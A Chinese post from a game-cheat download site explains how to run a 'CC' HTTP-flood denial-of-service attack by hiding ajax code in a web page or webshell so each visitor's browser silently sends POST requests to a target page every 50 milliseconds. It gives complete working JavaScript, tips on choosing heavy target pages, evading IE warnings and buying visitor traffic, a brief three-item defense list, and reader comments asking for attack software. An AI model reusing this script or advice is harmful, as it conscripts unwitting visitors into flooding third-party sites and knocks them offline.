玖爱辅助网为您提供最新免费游戏辅助(CF.lol.QQ飞车.守望先锋等),QQ活动,QQ教程,QQ软件,易语言源码,易语言教程等信息 - 凌哥QQ:1027663760

基于ajax的CC攻击思路及其防御

浏览次数:5272发布时间:2015-3-1 13:03当前分类:其它源码评论数量:加载中

首先需要有自己的web站点或webshell来建立或修改某页面加入ajax代码,用户访问自己所建立的ajax页面,ajax页面自动不断地向指定被攻击站点的页面发送数据包,实现cc攻击效果。由于ajax跨域安全限制,发送数据包后浏览器是不会获取返回数据的,这样对当前访问的用户基本没有影响,跟正常访问没区别。

1、选择目标站点的被攻击的页面要选择其中获取数据量较大的页面

2、因为跨域限制,在IE下会弹出警告,为了自己站点的正常访问最好加上代码忽略掉ie浏览器用户

3、为了保证ajax页面访问量,可通过一些免费互刷网站流量平台来实现提高ajax页面的访问量

示例代码如下:

<script type="text/javascript">
var t_postdata='id=abcdefgabcdefgabcdefgabcdefg';
var t_url='http://被攻击网站/被攻击页面.php';
function c_xmlHttp(){
 if(window.ActiveXObject){
  xmlHttp=new ActiveXObject('Microsoft.XMLHTTP');
 }else if(window.XMLHttpRequest){
  xmlHttp=new XMLHttpRequest();
 }
 return xmlHttp;
}

function post_send(){
 var xmlHttp=c_xmlHttp();
 xmlHttp.open("POST",t_url,true);
 xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
 xmlHttp.send(t_postdata);
 r_send();
}

function r_send(){
 setTimeout("post_send()", 50);
}

var ie = !-[1,];
if(!ie){
setTimeout("post_send()", 2000);
}
</script>

防御方法:

1、对数据量比较大的页面使用缓存,尽量减少数据库连接;

2,对访问者设置session或cookie,限制时段内访问次数;

3,缩短Timeout时间,连接过多时丢弃一部分数据。

玖爱辅助网 - 本站版权及附件下载说明

1、本站所有文章均由凌哥发布,与玖爱辅助网同时享有本文章相关版权

2、同类型的网站与软件站 在转载本站原创软件时请注明软件来源:玖爱辅助网

3、如果您在下载本站的软件/教程出现任何问题可以:查看软件下载教程

4、本文链接:https://www.9ifz.cc/qtym/478.html百度收录:已收录

二维码

上一篇:CF3月14日15:30准点在线领取精彩豪礼!

下一篇:种子搜索神器,十几万个种子任你选!

相关内容推荐
  • 用户:刘伟 发表评论:凌哥 求cc攻击软件 评论时间:2015-6-28 17:15
  • 用户:唯爱丨 发表评论:弄个IP攻击的, 评论时间:2015-6-27 10:55
  • 用户:玖爱辅助网 发表评论:有啊,而且威力肯定比本文说的这个大 评论时间:2015-5-2 14:32
  • 用户:情若不动,心定不会痛、 发表评论:cc攻击有软件吗 评论时间:2015-4-13 20:42
  • 4